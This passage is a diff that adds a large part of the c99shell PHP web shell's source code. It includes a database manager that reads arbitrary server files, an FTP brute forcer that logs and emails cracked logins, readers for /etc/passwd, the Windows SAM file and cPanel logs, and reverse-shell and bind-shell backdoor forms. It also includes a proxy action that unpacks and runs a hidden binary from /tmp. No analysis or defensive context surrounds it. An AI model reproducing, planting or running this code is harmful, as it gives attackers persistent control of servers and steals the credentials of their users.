+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
